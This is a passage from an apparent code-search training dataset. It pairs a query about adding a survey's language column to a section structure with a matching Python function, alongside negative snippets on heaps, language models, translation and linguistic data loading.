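heap.min_heapify(0, arr, size)    # restore the heap property from the root down
print(smallest, arr[0])           # 1 2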
|
[
"def min_heapify(arr):\n parent = ((len(arr) - 1) - 1) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1",
"def repair_heap(array, start_index, heap_size):\n\n # Check given given parameter data type.\n if not type(array) == list:\n raise TypeError('array must be a list')\n\n # Assume current node is max\n max_index = start_index\n left_child_index = 2*start_index+1\n right_child_index = 2*start_index+2\n\n # Check if left child node exists and has higher value than parent node\n if left_child_index < heap_size and \\\n array[left_child_index] > array[max_index]:\n max_index = left_child_index\n\n # Check if right child node exists and has even higher value\n # than both parent and left child node\n if right_child_index < heap_size and \\\n array[right_child_index] > array[max_index]:\n max_index = right_child_index\n\n # Swap values if root is not max\n if max_index != start_index:\n array[max_index], array[start_index] \\\n = array[start_index], array[max_index]\n repair_heap(array, max_index, heap_size)\n\n return array",
"def construct_minheap_recursive(arr):\n if len(arr) > 0:\n v = arr.pop()\n heap = BTNode(v)\n else:\n return None\n heap.left = construct_minheap_recursive(arr)\n heap.right = construct_minheap_recursive(arr)\n fix_minheap(heap, heap.value)\n return heap",
"def heapRemoveSmallest(self,heap,vertices):\r\n vertices[heap[0][0]]=-1\r\n if len(heap)==1:\r\n heap.pop()\r\n return\r\n vertices[heap[len(heap)-1][0]] =0\r\n heap[0]=heap[len(heap)-1]\r\n heap.pop()\r\n if len(heap)>0:\r\n self.down(heap,0,vertices)",
"def heapify(self):\n n = len(self.storage)\n # Transform bottom-up. The largest idx there's any point to looking at is\n # the largest with a child idx in-range, so must have 2*idx + 1 < n,\n # or idx\n for i in reversed(range(n // 2)):\n self._sift_up(i)",
"def djikstra_heap(s=0):",
"def _mk_encode_tree(self):\n \n freq_heap = MinHeap.from_iterable(self.freq_list)\n while len(freq_heap) > 1:\n # get the nodes with the smallest frequency\n a = freq_heap.remove()\n b = freq_heap.remove()\n\n # make the new node and add it in it's proper position\n new_node = TreeNode(a.freq + b.freq, content = None)\n new_node.lchild = a\n new_node.rchild = b\n freq_heap.insert(new_node)\n\n return freq_heap.remove()",
"def min_heapify(a, n, idx):\n min_idx = idx\n left = 2*idx + 1\n right = 2*idx + 2\n\n if left < n and a[left] < a[min_idx]:\n min_idx = left\n if right < n and a[right] < a[min_idx]:\n min_idx = right\n\n if min_idx != idx:\n a[min_idx], a[idx] = a[idx], a[min_idx]\n min_heapify(a, n, min_idx)",
"def heapify(self, array):\n\n heap = MinHeap()\n heap.list = array\n\n if len(heap.list) > 0:\n height = math.floor(math.log2(len(heap.list)))\n leaves_if_full = 2**height\n nodes_if_full = leaves_if_full * 2 - 1\n first_leaf = nodes_if_full - leaves_if_full\n for index in range(first_leaf,len(heap.list)):\n heap.percolate_up(index)\n return heap",
"def build_tree(heap: list) -> HuffmanNode:\n while len(heap) > 1:\n node1 = heappop(heap)\n node2 = heappop(heap)\n merged = HuffmanNode(node1.weight + node2.weight)\n merged.left = node1\n merged.right = node2\n heappush(heap, merged)\n return heap[0]",
"def heapify(arr, n, i):\n\tlargest = i\n\tleft = 2 * i + 1 # (2i + 1)\n\tright = 2 * i + 2 # (2i + 2)\n\n\t# See if left child of root exists and is\n\t# greater than root\n\tif left < n and arr[largest] < arr[left]:\n\t\tlargest = left\n\n\t# See if right child of root exists and is\n\t# greater than root\n\tif right < n and arr[largest] < arr[right]:\n\t\tlargest = right\n\n\t# Change root, if needed\n\tif largest != i:\n\t\tarr[largest], arr[i] = arr[i], arr[largest]\n\n\t\t# Heapify the root.\n\t\theapify(arr, n, largest)",
"def _tree_min(self, subtree):\n walker_node = subtree\n while walker_node.left != NIL_NODE:\n walker_node = walker_node.left\n\n return walker_node",
"def test_build_minheap_recursive(self):\n ref = [1, 2, 3, 19, 17, 7, 25, 36, 100]\n res = min_heap.MinHeap([100, 36, 25, 19, 17, 7, 3, 2, 1])\n self.assertEqual(ref, res.array)",
"def test_minheap_build_minheap_recursive(self):\n ref = [1, 2, 3, 4, 7, 8, 9, 10, 14, 16]\n res = [1, 2, 3, 4, 7, 8, 9, 10, 14, 16]\n heap = min_heap.MinHeap()\n heap.build_min_heap(res)\n self.assertEqual(res, ref)",
"def sift_up(self, idx):\n parent = self.get_parent(idx)\n if (parent is None):\n return # Stop if we are at the root of the heap\n\n if (self.heap[idx] > self.heap[parent]):\n self.swap(idx, parent)\n return self.sift_up(parent)",
"def max_heapify(arr):\n parent = ((len(arr) - 1) - 1 ) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1\n return",
"def heap_sort(self):\r\n \r\n tempList = []\r\n \r\n #store size of heap\r\n size = self.heap_size\r\n \r\n for i in range(0,size):\r\n \r\n #call removeMax N times to return max element and remove max every iteration\r\n max = self.removeMax()\r\n \r\n tempList.append(max)\r\n \r\n #print(max._key,max._value,max._price)\r\n \r\n for i in range(0,size):\r\n \r\n self.insert(tempList[i])",
"def shallowest_spanning_tree(self):\r\n min = inf\r\n node = \"unassigned\"\r\n for i in range(self.size): # checks each node\r\n temp = self.nodes.copy()\r\n temp.remove(i)\r\n res = self.aux_sst(i) # calls auxiliary function\r\n if res < min: # returns node with min depth\r\n min = res\r\n node = i\r\n return node, min",
"def minChild(self, i):\n if i * 2 + 1 > self.currentSize:\n return i * 2\n else:\n if min(self.heapList[i*2], self.heapList[(i*2)+1]) == self.heapList[i*2]:\n return i*2\n else:\n return i*2 + 1",
"def build_heap(self, da: DynamicArray) -> None:\n \n # create a copy of the array\n newArr = DynamicArray()\n \n for num in range(da.length()):\n newArr.append(da[num])\n \n # assign the heap to the copied array and find first non-leaf node\n self.heap = newArr\n current = newArr.length() // 2 - 1\n \n # percolate current down to the correct spot and decrement current \n # until root is reached\n while current >= 0:\n self.percolate_down(current)\n current -= 1"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Get the language column and create a new key for it in the structure_by_section, while creating a file_answer so that it can be plotted later in the analysis.
|
def create_language_section(self, df, structure_by_section):
path_to_language = os.path.join('../survey_creation', self.year, self.country, 'listAnswers', 'languages.csv')
list_of_languages = self.df['startlanguage. Start language'].unique()
if len(list_of_languages) > 1:
with open(path_to_language, 'w+') as f:
for language in list_of_languages:
f.write(language)
f.write('\n')
dict_to_add = {0:{'language': [{'survey_q': ['startlanguage. Start language'],
'original_question': ['startlanguage. Start language'],
'answer_format': 'one choice',
'file_answer': path_to_language,
'order_question': False}]}}
structure_by_section.update(dict_to_add)
structure_by_section.move_to_end(0, last=False)
return self.df, structure_by_section
|
[
"def load_wiktionary(configuration, verbose=0):\n\n df = pandas.read_csv(configuration['wiktionary_translations_path'],\n sep='\\t', usecols=['ID', 'Concept_ID', 'Concept', 'Languoid', 'Language_name', 'Form'])\n\n\n if verbose:\n print()\n print('number of available languages', len(set(df.Language_name)))\n print('language that have Dutch in the name')\n for language in set(df.Language_name):\n if 'Dutch' in language:\n print(language)\n print('we use: Dutch; Flemish')\n\n df = df[df.Language_name == 'Dutch; Flemish']\n\n english_lemmas = []\n english_definitions = []\n\n for index, row in df.iterrows():\n concept = row['Concept']\n lemma, *definitions = concept.split('/')\n english_lemmas.append(lemma)\n english_definitions.append('/'.join(definitions))\n\n df['English_lemma'] = english_lemmas\n\n dutch2english = defaultdict(set)\n english2dutch = defaultdict(set)\n\n for index, row in df.iterrows():\n english_lemma = row['English_lemma']\n dutch_lemma = row['Form']\n dutch2english[dutch_lemma].add(english_lemma)\n english2dutch[english_lemma].add(dutch_lemma)\n\n if verbose:\n print(f'Dutch lemmas with English translations: {len(dutch2english)}')\n print(f'English lemmas with Dutch translations: {len(english2dutch)}')\n\n return dutch2english, english2dutch",
"def data_language(df):\n if \"date/time\" in df.columns:\n return \"English\"\n elif \"date/heure\" in df.columns:\n return \"French\"\n elif \"fecha y hora\" in df.columns:\n return \"Spanish\"\n elif \"Data/Ora:\" in df.columns:\n return \"Italian\"\n elif \"Datum/Uhrzeit\" in df.columns:\n return \"German\"",
"def section(c32, name):\n\n entries = documents.entries\n\n if 'document' == name:\n return c32.template('2.16.840.1.113883.3.88.11.32.1')\n if 'allergies' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.102')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.2')\n\n el.entries = entries\n return el\n if 'demographics' == name:\n return c32.template('2.16.840.1.113883.3.88.11.32.1')\n if 'encounters' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.127')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.3')\n\n el.entries = entries\n return el\n if 'immunizations' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.117')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.6')\n\n el.entries = entries\n return el\n if 'results' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.122')\n el.entries = entries\n return el\n if 'medications' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.112')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.8')\n\n el.entries = entries\n return el\n if 'problems' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.103')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.11')\n\n el.entries = entries\n return el\n if 'procedures' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.108')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.12')\n\n el.entries = entries\n return el\n if 'vitals' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.119')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.16')\n\n el.entries = entries\n return el\n\n\n return None",
"def prepare_um(language):\n code = LANGUAGES[language]\n file_name = os.path.join(UNIMORPH_DIR, code, code)\n result = []\n with open(file_name) as file:\n for line in file:\n if line.split():\n lemma, inflected, features = line.strip().split(\"\\t\")\n features = set(features.split(\";\"))\n data = {\"word\": inflected, \"lemma\": lemma}\n data[\"pos\"] = map_pos(features)\n data[\"number\"] = map_number(features)\n data[\"gender\"] = map_gender(features)\n data[\"case\"] = map_case(features)\n data[\"person\"] = map_person(features)\n result.append(data)\n return pd.DataFrame(result)",
"def translate_section(data):\n sect_str = \"\"\n elements = data.get(\"Elements\", [])\n for elem in elements:\n print(\" Translating \" + elem[\"Type\"])\n sect_str += translate_map[elem[\"Type\"]](elem)\n return sect_str",
"def change_language():\n\tglobal language_dict,k\n\thello.config(text=language_dict[k])\n\tk = (1 + k) % 6",
"def write_languages(args):\n db = _db(args)\n api = _api(args)\n\n all_studies = _get_all_study_names(db)\n union_query_array = []\n union_query_withstudy_array = []\n for study in all_studies:\n union_query_array.append(\"SELECT * FROM Languages_%s\" % (study))\n union_query_withstudy_array.append(\n \"SELECT *, '%s' AS Study FROM Languages_%s\" % (study, study))\n\n # first check for language uniqueness across studies\n query = \"\"\"SELECT DISTINCT LanguageIx, count(*) AS c FROM (%s) AS t\n GROUP BY LanguageIx HAVING c > 1\"\"\" % (\n \" UNION \".join(union_query_array))\n data = list(db(query))\n if len(data) > 0:\n args.log.warning(\n \"\\nData of these languages differ across studies - please clean up data first:\")\n for row in data:\n args.log.warning(\"\\n\")\n for study in all_studies:\n query = \"\"\"SELECT LanguageIx, ShortName FROM Languages_%s\n WHERE LanguageIx = %s\"\"\" % (study, row['LanguageIx'])\n qdata = list(db(query))\n if len(qdata) > 0:\n args.log.warning(\"LanguageIx = %s (%s) in study %s\" % (\n qdata[0]['LanguageIx'], qdata[0]['ShortName'], study))\n return\n\n # make sure all studies will be concatenated\n db(\"SET @@group_concat_max_len = 4096\")\n query = \"\"\"SELECT DISTINCT *, GROUP_CONCAT(Study) AS Studies FROM (%s) AS t\n GROUP BY LanguageIx\"\"\" % (\" UNION \".join(union_query_withstudy_array))\n data = db(query)\n # header minus last two columns Study and Studies\n header = data.keys()[:-2]\n\n # go through each row, get mapping LanguageIx and Study and\n # delete the last two columns\n data_db = list()\n study_lg_map_data = list()\n for row in data:\n data_db.append(row[:-2])\n for s in row['Studies'].split(\",\"):\n study_lg_map_data.append([row['LanguageIx'], s])\n\n _write_csv_to_file(data_db, 'languages.csv', api, header)\n _write_csv_to_file(study_lg_map_data, 'x_study_languages.csv', api, [\n 'LanguageIx', 'StudyName'])",
"def build_LM(in_file):\n print('building language models...')\n # This is an empty method\n # Pls implement your code in below\n \n LM = {}\n \n # counting total number of 4-grams in each language in the training text\n total_no_of_words = {\"malaysian\":0, \"indonesian\":0, \"tamil\":0}\n \n with open(in_file, mode=\"r\", encoding=\"utf-8\") as f:\n textList = f.readlines()\n \n for line in textList:\n \n [label, text] = preprocess_line( line ).split(maxsplit=1)\n \n # count the number of 4-grams for each line in training text\n if len(text) >= 4 and label in total_no_of_words:\n total_no_of_words[label] += len(text) - 3\n else:\n sys.exit(\"Error! Some sentences in the training text contains \"\n \"less than 4 characters!!! OR the language is not \"\n \"malasian, indonesian, or tamil.\")\n \n grams = convert_line_to_4gramList(text)\n \n # update the count for each gram in our language model\n for gram in grams:\n \n # init to be zero\n if gram not in LM:\n LM[gram] = {\"malaysian\":0, \"indonesian\":0, \"tamil\":0}\n \n # update count\n LM[gram][label] += 1\n \n # add one smoothing for each gram\n for gram in LM:\n for lang in LM[gram]:\n LM[gram][lang] += 1\n \n return convert_counts_to_probability(total_no_of_words, LM)",
"def language_register(df):\n df['training language'] = ['None' if e == 'None' else corpora.language(e)\n for e in df['training set']]\n df['test language'] = ['None' if e == 'None' else corpora.language(e)\n for e in df['test set']]\n df['training register'] = ['None' if e == 'None' else corpora.register(e)\n for e in df['training set']]\n df['test register'] = ['None' if e == 'None' else corpora.register(e)\n for e in df['test set']]\n return df",
"def _collect_section_translations(exporter, sections, binding,\n export_what, key, rsrc):\n\n # For each section in the translation, make a record of that\n # in an internal data store which is used to generate .po\n # files.\n for section in sections:\n section_name = section['name']\n section_type = section['type']\n description = (\n binding.find_field(section_name).description or '')\n\n for translation in section['data']:\n message = translation['source_value'] or ''\n if not isinstance(message, basestring):\n message = unicode(message) # convert num\n translated_message = translation['target_value'] or ''\n is_current = translation['verb'] == VERB_CURRENT\n old_message = translation['old_source_value']\n\n # Skip exporting blank items; pointless.\n if not message:\n continue\n\n # If not exporting everything, and the current\n # translation is up-to-date, don't export it.\n if export_what != 'all' and is_current:\n continue\n\n # Set source string and location.\n message_entry = exporter.get_message(key, message)\n message_entry.add_location(key, section_name, section_type)\n\n # Describe the location where the item is found.\n message_entry.add_comment(description)\n\n try:\n resource_handler = resource.Registry.get(\n key.resource_key.type)\n title = resource_handler.get_resource_title(rsrc)\n if title:\n message_entry.add_comment(title)\n except AttributeError:\n # Under ETL, there is no real handler and title lookup\n # fails. In that case, we lose this data, which is non-\n # essential.\n pass\n\n # Add either the current translation (if current)\n # or the old translation as a remark (if we have one)\n if is_current:\n message_entry.add_translation(translated_message)\n else:\n message_entry.add_translation('')\n\n if old_message:\n message_entry.set_previous_id(old_message)\n if translated_message:\n message_entry.add_comment(\n 'Previously translated as: \"%s\"' %\n translated_message)",
"def prepare(language):\n ud = prepare_ud(language)\n try:\n um = prepare_um(language)\n result = pd.concat([ud, um], ignore_index=True, sort=False)\n except FileNotFoundError: # No UniMorph data for this language\n result = ud\n result[\"word\"] = result[\"word\"].str.lower()\n result[\"person\"] = result[\"person\"].astype(str)\n result.drop_duplicates(inplace=True)\n # drop rows with missing words\n result.dropna(subset=[\"word\", \"pos\"], how=\"any\", inplace=True)\n # drop rows with no feature values in all four features\n features = [\"number\", \"gender\", \"case\", \"person\"]\n has_no_values = (result[features] == NA).all(axis=1)\n result = result[~has_no_values]\n return result[COLS]",
"def reference_keys_to_dataset_keys(rmapping, header):\n header = dict(header)\n\n # Basic common pattern translations\n translations = {\n \"META.EXPOSURE.P_EXPTYPE\" : \"META.EXPOSURE.TYPE\",\n \"P_EXP_TY\" : \"META.EXPOSURE.TYPE\",\n\n \"META.INSTRUMENT.P_BAND\" : \"META.INSTRUMENT.BAND\",\n \"P_BAND\" : \"META.INSTRUMENT.BAND\",\n\n \"META.INSTRUMENT.P_DETECTOR\" : \"META.INSTRUMENT.DETECTOR\",\n \"P_DETECT\" : \"META.INSTRUMENT.DETECTOR\",\n\n \"META.INSTRUMENT.P_CHANNEL\" : \"META.INSTRUMENT.CHANNEL\",\n \"P_CHANNE\" : \"META.INSTRUMENT.CHANNEL\",\n\n \"META.INSTRUMENT.P_FILTER\" : \"META.INSTRUMENT.FILTER\",\n \"P_FILTER\" : \"META.INSTRUMENT.FILTER\",\n\n \"META.INSTRUMENT.P_PUPIL\" : \"META.INSTRUMENT.PUPIL\",\n \"P_PUPIL\" : \"META.INSTRUMENT.PUPIL\",\n\n \"META.INSTRUMENT.P_MODULE\" : \"META.INSTRUMENT.MODULE\",\n \"P_MODULE\" : \"META.INSTRUMENT.MODULE\",\n\n \"META.SUBARRAY.P_SUBARRAY\" : \"META.SUBARRAY.NAME\",\n \"P_SUBARR\" : \"META.SUBARRAY.NAME\",\n\n \"META.INSTRUMENT.P_GRATING\" : \"META.INSTRUMENT.GRATING\",\n \"P_GRATIN\" : \"META.INSTRUMENT.GRATING\",\n\n \"META.EXPOSURE.PREADPATT\" : \"META.EXPOSURE.READPATT\",\n \"META.EXPOSURE.P_READPATT\" : \"META.EXPOSURE.READPATT\",\n \"P_READPA\" : \"META.EXPOSURE.READPATT\",\n\n # vvvv Speculative, not currently defined or required by CAL vvvvv\n \"META.INSTRUMENT.PCORONAGRAPH\" : \"META.INSTRUMENT.CORONAGRAPH\",\n \"P_CORONM\" : \"META.INSTRUMENT.CORONAGRAPH\",\n }\n\n # Rmap header reference_to_dataset field tranlations, can override basic!\n try:\n translations.update(rmapping.reference_to_dataset)\n except AttributeError:\n pass\n\n log.verbose(\"reference_to_dataset translations:\\n\", log.PP(translations), verbosity=60)\n log.verbose(\"reference_to_dataset input header:\\n\", log.PP(header), verbosity=80)\n\n for key in header:\n # Match META.X.P_SOMETHING or P_SOMETH\n if (key.split(\".\")[-1].startswith(\"P_\")) and key not in translations:\n log.warning(\"CRDS-pattern-like keyword\", repr(key),\n \"w/o CRDS translation to corresponding dataset keyword.\")\n log.info(\"Pattern-like keyword\", repr(key),\n \"may be misspelled or missing its translation in CRDS. Pattern will not be used.\")\n log.info(\"The translation for\", repr(key),\n \"can be defined in crds.jwst.locate or rmap header reference_to_dataset field.\")\n log.info(\"If this is not a pattern keyword, adding a translation to 'not-a-pattern'\",\n \"will suppress this warning.\")\n\n # Add replacements for translations *if* the existing untranslated value\n # is poor and the translated value is better defined. This is to do\n # translations w/o replacing valid/concrete DM values with something\n # like guessed values of \"UNDEFINED\" or \"N/A\".\n for rkey in sorted(translations):\n if rkey in header:\n dkey = translations[rkey]\n dval = header.get(translations[rkey], None)\n rval = header[rkey]\n if rval not in [None, \"UNDEFINED\"] and rval != dval:\n log.info(\"Setting\", repr(dkey), \"=\", repr(dval),\n \"to value of\", repr(rkey), \"=\", repr(rval))\n header[dkey] = rval\n\n header = abstract.cross_strap_header(header)\n\n # NOTE: the hacks below happen after cross-strapping and pattern handling\n # so if the keywords are still undefined they're undefined. 
They have to\n # be explicitly defined as UNDEFINED somehow since they're nearly universally\n # used in constraints as condition variables even if they're not used in rmaps.\n # Unlike the targets of constraints, CRDS is nominally unaware of condition\n # variables so they need to be incidentally defined. This currently doesn't\n # work out if the rmap doesn't use them. Condition variables are eval'ed in\n # expressions.\n\n if \"SUBARRAY\" not in header:\n header[\"SUBARRAY\"] = header[\"META.SUBARRAY.NAME\"] = \"UNDEFINED\"\n\n if \"EXP_TYPE\" not in header:\n header[\"EXP_TYPE\"] = header[\"META.EXPOSURE.TYPE\"] = \"UNDEFINED\"\n\n if \"USEAFTER\" not in header and \"META.USEAFTER\" in header:\n header[\"USEAFTER\"] = header[\"META.USEAFTER\"]\n if \"USEAFTER\" not in header and \"META.USEAFTER\" in header:\n header[\"USEAFTER\"] = header[\"META.USEAFTER\"]\n\n # If USEAFTER is defined, or we're configured to fake it...\n # don't invent one if its missing and we're not faking it.\n if \"USEAFTER\" in header or config.ALLOW_BAD_USEAFTER:\n\n # Identify this as best as possible,\n filename = header.get(\"FILENAME\", None) or rmapping.filename\n\n reformatted = timestamp.reformat_useafter(filename, header).split()\n header[\"DATE-OBS\"] = header[\"META.OBSERVATION.DATE\"] = reformatted[0]\n header[\"TIME-OBS\"] = header[\"META.OBSERVATION.TIME\"] = reformatted[1]\n\n log.verbose(\"reference_to_dataset output header:\\n\", log.PP(header), verbosity=80)\n\n return header",
"def language_model_dataset(self):\n ##adding sentence begin and end\n lmodel_data = copy.deepcopy(self.vector_dataset[0])\n lmodel_label = copy.deepcopy(self.vector_dataset[0])\n for tr_data, lb_data in zip(lmodel_data, lmodel_label):\n tr_data.insert(0,self.word2index(self.sentence_begin))\n lb_data.append(self.word2index(self.sentence_end))\n return lmodel_data, lmodel_label",
"def compile_ref_list(lang):\r\n\r\n # Fetching all relevant data\r\n ingred_cal = pd.read_excel(PATH + r'\\data\\ingredients_reference.xlsx', sheet_name=0).apply \\\r\n (lambda x: x.str.strip() if x.dtype == \"object\" else x)\r\n plurals = pd.read_excel(PATH + r'\\data\\ingredients_reference.xlsx', sheet_name=3).apply \\\r\n (lambda x: x.str.strip() if x.dtype == \"object\" else x)\r\n synonyms = pd.read_excel(PATH + r'\\data\\ingredients_reference.xlsx', sheet_name=4).apply \\\r\n (lambda x: x.str.strip() if x.dtype == \"object\" else x)\r\n\r\n # Add English ingredient description as a key\r\n ingred_cal.insert(0, \"en_key\", \"\")\r\n ingred_cal.loc[:, \"en_key\"] = ingred_cal[\"en\"]\r\n\r\n df_lang = ingred_cal[\r\n [\"en_key\", lang, \"type\", \"co2\", \"classification\", \"attribute\", \"variety\"]\r\n ]\r\n df_lang.loc[:, \"lower\"] = df_lang[lang].str.lower()\r\n\r\n # Add ingredient description of selected language as a key\r\n df_lang.insert(1, \"lang_key\", \"\")\r\n df_lang.loc[:, \"lang_key\"] = df_lang[lang]\r\n\r\n plurals_lang = plurals.loc[plurals[\"language\"] == lang]\r\n plurals_lang.loc[:, \"lower\"] = plurals_lang[\"singular\"].str.lower()\r\n\r\n # Merge with plurals of ingredients\r\n df2 = pd.merge(\r\n df_lang, plurals_lang, left_on=\"lower\", right_on=\"lower\", how=\"inner\"\r\n )[\r\n [\r\n \"en_key\",\r\n \"lang_key\",\r\n \"plural\",\r\n \"type\",\r\n \"co2\",\r\n \"classification\",\r\n \"attribute\",\r\n \"variety\",\r\n ]\r\n ]\r\n df2 = df2.rename(columns={\"plural\": lang})\r\n\r\n synonyms_lang = synonyms.loc[synonyms[\"language\"] == lang]\r\n synonyms_lang.loc[:, \"lower\"] = synonyms_lang[\"source\"].str.lower()\r\n\r\n # Merge with synonyms of ingredients\r\n df3 = pd.merge(\r\n df_lang, synonyms_lang, left_on=\"lower\", right_on=\"lower\", how=\"inner\"\r\n )[\r\n [\r\n \"en_key\",\r\n \"lang_key\",\r\n \"target\",\r\n \"type\",\r\n \"co2\",\r\n \"classification\",\r\n \"attribute\",\r\n \"variety\",\r\n ]\r\n ]\r\n df3 = df3.rename(columns={\"target\": lang})\r\n\r\n # Append all reference lists\r\n df_lang = df_lang[\r\n [\r\n \"en_key\",\r\n \"lang_key\",\r\n lang,\r\n \"type\",\r\n \"co2\",\r\n \"classification\",\r\n \"attribute\",\r\n \"variety\",\r\n ]\r\n ]\r\n df_lang = df_lang.append(df2)\r\n df_lang = df_lang.append(df3)\r\n\r\n df_lang = df_lang.rename(columns={lang: \"ref\"})\r\n df_lang = df_lang.reset_index(drop=True)\r\n\r\n return df_lang",
"def translate_tab(data):\n tab_str = \"\"\n sections = data.get(\"Sections\", [])\n for section in sections:\n print(\" Translating \" + section[\"Type\"])\n tab_str += translate_map[section[\"Type\"]](section)\n return tab_str",
"def build_LM(in_file):\r\n print 'building language models...'\r\n # create a new language model\r\n lm = {}\r\n # count the number of occurance of 4-grams in the training set for each language\r\n # see LANG_INDEX for the index representation\r\n count = [0,0,0]\r\n\r\n with open(in_file, 'r') as infile:\r\n for line in infile:\r\n # convert language tag to index\r\n lang = line.split(\" \")[0]\r\n # sentence with punctuation removed and all characters converted to lowercase\r\n s = re.sub('[^a-zA-Z ]', '', line[len(lang) + 1:]).lower()\r\n # count frequency of appearance for each 4-grams\r\n for i in range(-3,len(s)):\r\n # Use ^ to pad the beginning\r\n if i < 0:\r\n part = '^'*(0 - i) + s[0:4+i]\r\n # Use # to pad the end\r\n elif(i+4 > len(s)):\r\n part = s[i:len(s)] + '#'*(i+4-len(s))\r\n else:\r\n part = s[i:i+4]\r\n # create a new 4-grams record if not exist\r\n if part not in lm: \r\n lm[part] = [0,0,0]\r\n\r\n #print(\"#\"+str(i)+\" \"+part)\r\n # add frequency count by 1\r\n lm[part][LANG_TO_INDEX[lang]] += 1\r\n count[LANG_TO_INDEX[lang]] += 1\r\n #print(lm)\r\n\r\n # calculate probability with add-1 smoothing\r\n # add the size of the LM to 'token' count since we are going to do add-1 for every 4-gram\r\n count = map(lambda x: x + len(lm),count)\r\n\r\n new_lm = {}\r\n for key,value in lm.items():\r\n # probability of a 4-gram\r\n p = [0, 0, 0]\r\n for i in range(3):\r\n p[i] = (value[i] + 1.0) / count[i]\r\n # save it to the final LM\r\n new_lm[key] = p\r\n\r\n return new_lm",
"def build_sections_for_key(\n key, course, resource_bundle_dto, transformer):\n\n def add_known_translations_as_defaults(locale, sections):\n try:\n translations = i18n.get_store().get_translations(locale)\n except AssertionError:\n # We're in an environment, like ETL, where we cannot get_store()\n # because we're not in a request in the container so we don't\n # have a WSGIApplication. In that case, we return here and\n # accept some missing (nonessential) values in the output files.\n return\n\n for section in sections:\n for item in section['data']:\n if item['verb'] == VERB_NEW:\n # NOTE: The types of source values we are getting here\n # include: unicode, str, float, and None. It appears\n # to be harmless to force a conversion to unicode so\n # that we are uniform in what we are asking for a\n # translation for.\n source_value = unicode(item['source_value'] or '')\n if source_value:\n target_value = translations.gettext(source_value)\n # File under very weird: Mostly, the i18n library\n # hands back unicode instances. However,\n # sometimes it will give back a string. And\n # sometimes, that string is the UTF-8 encoding of\n # a unicode string. Convert it back to unicode,\n # because trying to do reasonable things on such\n # values (such as casting to unicode) will raise\n # an exception.\n if type(target_value) == str:\n try:\n target_value = target_value.decode('utf-8')\n except UnicodeDecodeError:\n pass\n if target_value != source_value:\n item['target_value'] = target_value\n # Flag the text as needing accepted\n item['verb'] = VERB_CHANGED\n\n schema = key.resource_key.get_schema(course)\n values = key.resource_key.get_data_dict(course)\n binding = schema_fields.ValueToTypeBinding.bind_entity_to_schema(\n values, schema)\n allowed_names = TRANSLATABLE_FIELDS_FILTER.filter_value_to_type_binding(\n binding)\n existing_mappings = []\n if resource_bundle_dto:\n for name, value in resource_bundle_dto.dict.items():\n if value['type'] == TYPE_HTML:\n source_value = value['source_value']\n target_value = ''\n else:\n source_value = value['data'][0]['source_value']\n target_value = value['data'][0]['target_value']\n\n existing_mappings.append(xcontent.SourceToTargetMapping(\n name, None, value['type'], source_value, target_value))\n\n mappings = xcontent.SourceToTargetDiffMapping.map_source_to_target(\n binding, allowed_names=allowed_names,\n existing_mappings=existing_mappings)\n\n map_lists_source_to_target = (\n xcontent.SourceToTargetDiffMapping.map_lists_source_to_target)\n\n sections = []\n for mapping in mappings:\n if mapping.type == TYPE_HTML:\n html_existing_mappings = []\n if resource_bundle_dto:\n field_dict = resource_bundle_dto.dict.get(mapping.name)\n if field_dict:\n html_existing_mappings = field_dict['data']\n context = xcontent.Context(\n xcontent.ContentIO.fromstring(mapping.source_value))\n transformer.decompose(context)\n\n html_mappings = map_lists_source_to_target(\n context.resource_bundle,\n [m['source_value'] for m in html_existing_mappings])\n source_value = mapping.source_value\n data = []\n for html_mapping in html_mappings:\n if html_mapping.target_value_index is not None:\n target_value = html_existing_mappings[\n html_mapping.target_value_index]['target_value']\n else:\n target_value = ''\n data.append({\n 'source_value': html_mapping.source_value,\n 'old_source_value': html_mapping.target_value,\n 'target_value': target_value,\n 'verb': html_mapping.verb,\n 'changed': False})\n else:\n old_source_value = ''\n if mapping.verb == VERB_CHANGED:\n 
existing_mapping = (\n xcontent.SourceToTargetMapping.find_mapping(\n existing_mappings, mapping.name))\n if existing_mapping:\n old_source_value = existing_mapping.source_value\n\n source_value = ''\n data = [{\n 'source_value': mapping.source_value,\n 'old_source_value': old_source_value,\n 'target_value': mapping.target_value,\n 'verb': mapping.verb,\n 'changed': False}]\n\n if any([item['source_value'] for item in data]):\n sections.append({\n 'name': mapping.name,\n 'label': mapping.label,\n 'type': mapping.type,\n 'source_value': source_value,\n 'data': data\n })\n\n if key.locale != course.app_context.default_locale:\n add_known_translations_as_defaults(key.locale, sections)\n return binding, sections",
"def prepare_ud(language):\n pattern = os.path.join(UNIVERSAL_DEPENDENCIES_DIR, \"**/*.conllu\")\n file_names = [f for f in glob(pattern, recursive=True) if language in f]\n result = []\n for file_name in file_names:\n features = prepare_one_ud_file(file_name)\n result.append(features)\n if result:\n return pd.concat(result, ignore_index=True, sort=False)\n return pd.DataFrame([], columns=COLS)",
